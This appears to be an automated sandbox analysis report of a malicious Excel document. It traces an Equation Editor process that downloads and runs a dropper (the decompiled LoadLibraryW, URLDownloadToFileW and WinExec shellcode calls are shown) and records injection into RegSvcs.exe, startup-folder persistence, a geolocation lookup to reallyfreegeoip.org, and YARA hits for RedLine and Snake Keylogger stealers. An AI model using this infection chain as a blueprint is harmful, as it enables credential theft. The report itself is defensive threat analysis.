                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 14
                                              Last-Modified: Sat, 04 May 2024 08:12:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOQ5LgJ10oe5dRIUi1EqVjpL9O2YBmDef07QLmB7qW9v9T%2BZTKpDDVVDuuwbBrktr7f4sBKNKtn60kymwXKXXm%2FQQ4jipAHGQMhxmeJIXvRjQASSupUBP3gAzZlQ3Yjqmb8ub9R8"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87e70678588d0fd3-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-04 08:12:21 UTC337INData Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c
                                              Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
                                              2024-05-04 08:12:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249170104.21.67.1524432160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-04 08:12:24 UTC62OUTGET /xml/81.181.54.104 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-05-04 08:12:24 UTC707INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:24 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 17
                                              Last-Modified: Sat, 04 May 2024 08:12:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9MBAlvXDJP582l23g6vfbcpqbp8O%2B8bj8i4YqbZ%2B1O7ZIL5ppnF40FAbciOd4KKoH%2BplzLctXqGMjlEIt0Es%2BxnLbPZDF2h6xfz5MDFooK%2BmQ1tLVIIdoar1H4DJxmUKrDTQCYY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87e7068cee657ba7-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-04 08:12:24 UTC337INData Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c
                                              Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
                                              2024-05-04 08:12:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:08:38
                                              Start date:04/05/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13faa0000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:2
                                              Start time:10:09:26
                                              Start date:04/05/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:10:09:32
                                              Start date:04/05/2024
                                              Path:C:\Users\user\AppData\Roaming\negrett.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\negrett.exe
                                              Imagebase:0xb10000
                                              File size:1'357'312 bytes
                                              MD5 hash:FBCCDD35EE6DCCADAEAA69E37FBBD171
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:10:11:58
                                              Start date:04/05/2024
                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\negrett.exe
                                              Imagebase:0xff0000
                                              File size:109'360'640 bytes
                                              MD5 hash:CF439A4CF698F8D15901A3CAA5F503FE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:10:11:59
                                              Start date:04/05/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\negrett.exe
                                              Imagebase:0xe30000
                                              File size:45'248 bytes
                                              MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:10
                                              Start time:10:12:12
                                              Start date:04/05/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                              Imagebase:0xfff20000
                                              File size:168'960 bytes
                                              MD5 hash:045451FA238A75305CC26AC982472367
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:10:12:13
                                              Start date:04/05/2024
                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                              Imagebase:0x1330000
                                              File size:109'360'640 bytes
                                              MD5 hash:CF439A4CF698F8D15901A3CAA5F503FE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:10:12:14
                                              Start date:04/05/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                              Imagebase:0xe30000
                                              File size:45'248 bytes
                                              MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:31.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:71.4%
                                                Total number of Nodes:21
                                                Total number of Limit Nodes:1
                                                execution_graph 111 353061c 112 353061e 111->112 115 3530631 LoadLibraryW 112->115 118 353064b 115->118 119 353064e 118->119 128 35306aa URLDownloadToFileW 119->128 121 353065c URLDownloadToFileW 134 35306c7 121->134 129 35306c7 3 API calls 128->129 130 35306b3 128->130 129->130 131 353072a 130->131 138 35306f5 130->138 131->121 135 35306ca 134->135 136 35306f5 3 API calls 135->136 137 35306ed 136->137 139 35306f8 WinExec 138->139 144 3530715 139->144 141 3530709 142 35306ed 141->142 143 3530718 ExitProcess 141->143 145 3530718 ExitProcess 144->145

                                                Callgraph

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 35306f5-353070a WinExec call 3530715 4 3530775-3530779 0->4 5 353070c 0->5 8 353077b 4->8 9 353077d 4->9 6 353075e 5->6 7 353070e 5->7 12 3530760-3530764 6->12 13 3530766-353076a 6->13 10 3530710-353071a ExitProcess 7->10 11 353077f-3530781 7->11 8->11 9->11 14 3530783-353078c 9->14 15 3530791-3530792 11->15 12->13 18 3530772 12->18 13->11 19 353076c-3530770 13->19 20 3530755-3530758 14->20 21 353078e 14->21 18->4 19->11 19->18 20->14 23 353075a 20->23 21->15 23->6
                                                APIs
                                                • WinExec.KERNEL32(?,00000001,?,035306ED,?,035306B3), ref: 03530702
                                                  • Part of subcall function 03530715: ExitProcess.KERNEL32(00000000,?,03530709,?,035306ED,?,035306B3), ref: 0353071A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExecExitProcess
                                                • String ID:
                                                • API String ID: 4112423671-0
                                                • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                • Instruction ID: 614d942ad7da57d3b8e87b9eff56571fdee83f9cbc47d090757fdba00a34fe56
                                                • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                • Instruction Fuzzy Hash: F7F0285990434221CB34F268A8557F6AB50FB53B80FCC88579893870F9E16891C38E5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: d6e2d5c03bbaae5047bd860e8c45a037063d601b7c33790b3230a9dcee21499f
                                                • Instruction ID: bbb00425d1dee4590821f23ddb7e51ac03fbf6052dafc7b703798251b456dc39
                                                • Opcode Fuzzy Hash: d6e2d5c03bbaae5047bd860e8c45a037063d601b7c33790b3230a9dcee21499f
                                                • Instruction Fuzzy Hash: DD1159A148C3C12FDB22E7704C6EB56BF642B93610F19CACEA1C60F4E7E7A49001C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 35306aa-35306ac URLDownloadToFileW 45 35306b3-35306be 44->45 46 35306ae call 35306c7 44->46 47 35306c0 45->47 48 353072c-3530734 call 3530744 45->48 46->45 50 35306c2-35306c3 47->50 51 353072b 47->51 52 3530739-353073b 48->52 50->52 53 35306c5-35306ee call 35306f5 50->53 51->48 54 353072a 52->54 55 353073d-3530741 52->55 54->48
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,0353065C,?,00000000,00000000), ref: 035306AC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                                • Instruction ID: bf9f899a89bc0fb7068ef65f058bb84f8773a7a88eba83bdd14039529e091dfa
                                                • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                                • Instruction Fuzzy Hash: 1E11AF305043023AC720E654AC44BB6F764FBD3B50F48C546E5938F0F9E2A0E443CE59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 59 3530631-3530633 LoadLibraryW call 353064b 61 3530638-353063d 59->61 62 353063f-3530646 61->62 63 35306ad-35306b1 61->63 62->63
                                                APIs
                                                • LoadLibraryW.KERNEL32(?), ref: 03530631
                                                  • Part of subcall function 0353064B: URLDownloadToFileW.URLMON(00000000,0353065C,?,00000000,00000000), ref: 035306AC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadFileLibraryLoad
                                                • String ID:
                                                • API String ID: 2776762486-0
                                                • Opcode ID: 311053999e2d96ff5b1b2860776d61a4941ced0df6fc86e7ee092ae38fd4629b
                                                • Instruction ID: 75376bb65f7b05b93bbfd7716f8617773a8f4310b346c8bce1801612d03a6c8e
                                                • Opcode Fuzzy Hash: 311053999e2d96ff5b1b2860776d61a4941ced0df6fc86e7ee092ae38fd4629b
                                                • Instruction Fuzzy Hash: 53C022C4041F4826D304B1103F331EE3F28F28321834A200194C3013B70000231B80EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 64 3530715-353071a ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,?,03530709,?,035306ED,?,035306B3), ref: 0353071A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                • Instruction ID: 2cc832ade3305ff475a219e014bf2aeb45ca367fc0be6509f279a459a524c15b
                                                • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                • Instruction Fuzzy Hash: 46D01775201602AFD244EB24DD80F27F76EFFC4651F14D264E5194B6AAD730E892CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:4.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.1%
                                                Total number of Nodes:1161
                                                Total number of Limit Nodes:56
                                                execution_graph 45432 b11033 45435 b14c91 45432->45435 45434 b11038 pre_c_initialization 45440 b1a961 45435->45440 45439 b14d9c 45439->45434 45441 b1a976 45440->45441 45447 b2fddb 45441->45447 45443 b14cff 45444 b13af0 45443->45444 45460 b13b1c 45444->45460 45449 b2fde0 45447->45449 45450 b2fdfa 45449->45450 45452 b2fdfc 45449->45452 45456 b3ea0c 45449->45456 45450->45443 45451 b3066e 45453 b3067c __CxxThrowException 45451->45453 45452->45451 45454 b3065f __CxxThrowException 45452->45454 45455 b30692 45453->45455 45454->45451 45455->45443 45459 b43820 45456->45459 45457 b43849 RtlAllocateHeap 45458 b4385c 45457->45458 45457->45459 45458->45449 45459->45457 45459->45458 45461 b13b0f 45460->45461 45462 b13b29 45460->45462 45461->45439 45462->45461 45463 b13b30 RegOpenKeyExW 45462->45463 45463->45461 45464 b13b4a RegQueryValueExW 45463->45464 45465 b13b80 RegCloseKey 45464->45465 45466 b13b6b 45464->45466 45465->45461 45466->45465 45467 b42317 45470 b4d1f6 45467->45470 45473 b4d213 45470->45473 45474 b4d20f 45470->45474 45472 b42326 45473->45474 45476 b44bfb 45473->45476 45484 b30a8c 45474->45484 45477 b44c07 ___DestructExceptionObject 45476->45477 45491 b450af 45477->45491 45479 b44c1d 45483 b44c2c __wsopen_s 45479->45483 45498 b44a8f 19 API calls 45479->45498 45481 b44c27 45499 b44b45 GetStdHandle GetFileType 45481->45499 45483->45473 45485 b30a97 IsProcessorFeaturePresent 45484->45485 45486 b30a95 45484->45486 45488 b30c5d 45485->45488 45486->45472 45515 b30c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45488->45515 45490 b30d40 45490->45472 45492 b450bb ___DestructExceptionObject 45491->45492 45493 b450c8 45492->45493 45495 b450df 45492->45495 45505 b427ec 17 API calls __wsopen_s 45493->45505 45496 b450d7 __wsopen_s 45495->45496 45500 b45000 45495->45500 45496->45479 45498->45481 45499->45483 45506 b44c7d 45500->45506 45502 b45012 45510 b429c8 45502->45510 45504 b45071 45504->45495 45505->45496 45509 b44c8a 45506->45509 45507 b44cb5 RtlAllocateHeap 45508 b44cc8 45507->45508 45507->45509 45508->45502 45509->45507 45509->45508 45511 b429d3 HeapFree 45510->45511 45514 b429fc 45510->45514 45512 b429e8 45511->45512 45511->45514 45513 b429ee GetLastError 45512->45513 45513->45514 45514->45504 45515->45490 45516 b12e37 45517 b1a961 3 API calls 45516->45517 45518 b12e4d 45517->45518 45547 b14ae3 45518->45547 45520 b12e6b 45551 b14ecb 45520->45551 45523 b52cb0 45574 b82cf9 45523->45574 45525 b52cc3 45526 b52ccf 45525->45526 45584 b14f39 45525->45584 45529 b14f39 24 API calls 45526->45529 45528 b12ead 45567 b1a81b VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 45528->45567 45536 b52ce5 45529->45536 45531 b12eec 45568 b1a81b VariantClear __CxxThrowException __CxxThrowException RtlAllocateHeap 45531->45568 45533 b12f21 45534 b1a961 3 API calls 45533->45534 45535 b12f3f 45534->45535 45569 b34a28 21 API calls __wsopen_s 45535->45569 45538 b12f59 45538->45536 45570 b34a28 21 API calls __wsopen_s 45538->45570 45540 b12f6e 45540->45536 45571 b34a28 21 API calls __wsopen_s 45540->45571 45542 b12f83 45542->45536 45572 b34a28 21 API calls __wsopen_s 45542->45572 45544 b12f98 45544->45536 45573 b163eb __CxxThrowException __CxxThrowException RtlAllocateHeap 45544->45573 45546 b12ff8 45548 b14af0 45547->45548 45550 b14b22 45548->45550 45590 b16b57 45548->45590 45550->45520 45552 b14edd 45551->45552 45595 b3e5eb 45552->45595 45555 b14ef6 LoadLibraryExW 45558 b14f0e 45555->45558 45556 b53ccf 45557 b14f39 24 API calls 45556->45557 45561 b53cd6 45557->45561 45598 b14f80 45558->45598 45560 b14f20 45560->45561 45562 b14f2c 45560->45562 45602 b828fe 45561->45602 45563 b14f39 24 API calls 45562->45563 45564 b12ea5 45563->45564 45564->45523 45564->45528 45566 b53d05 45567->45531 45568->45533 45569->45538 45570->45540 45571->45542 45572->45544 45573->45546 45575 b82d15 45574->45575 45576 b3ea0c RtlAllocateHeap 45575->45576 45581 b82d3f 45575->45581 45577 b82dba 45576->45577 45578 b3ea0c RtlAllocateHeap 45577->45578 45579 b82dc4 45578->45579 45580 b828fe 26 API calls 45579->45580 45582 b82dee 45580->45582 45581->45525 45582->45581 45680 b822ce 45582->45680 45585 b14f43 45584->45585 45587 b14f4a 45584->45587 45586 b3e678 23 API calls 45585->45586 45586->45587 45588 b14f59 45587->45588 45589 b14f6a FreeLibrary 45587->45589 45588->45526 45589->45588 45591 b54ba1 45590->45591 45592 b16b67 _wcslen 45590->45592 45593 b2fddb 3 API calls 45592->45593 45594 b16b7d 45592->45594 45593->45594 45594->45550 45609 b3e52a 45595->45609 45597 b14eea 45597->45555 45597->45556 45599 b14f95 45598->45599 45601 b14fdc 45599->45601 45627 b142a2 CreateStreamOnHGlobal 45599->45627 45601->45560 45633 b8274e 45602->45633 45606 b82942 45606->45566 45608 b82927 45608->45606 45642 b828d2 _memcmp 45608->45642 45611 b3e536 ___DestructExceptionObject 45609->45611 45610 b3e544 45620 b427ec 17 API calls __wsopen_s 45610->45620 45611->45610 45612 b3e574 45611->45612 45615 b3e554 __wsopen_s 45612->45615 45616 b48061 45612->45616 45615->45597 45617 b4806d ___DestructExceptionObject 45616->45617 45621 b480fb 45617->45621 45619 b48088 __wsopen_s 45619->45615 45620->45615 45625 b4811e 45621->45625 45622 b44c7d _unexpected RtlAllocateHeap 45623 b48180 45622->45623 45624 b429c8 _free 2 API calls 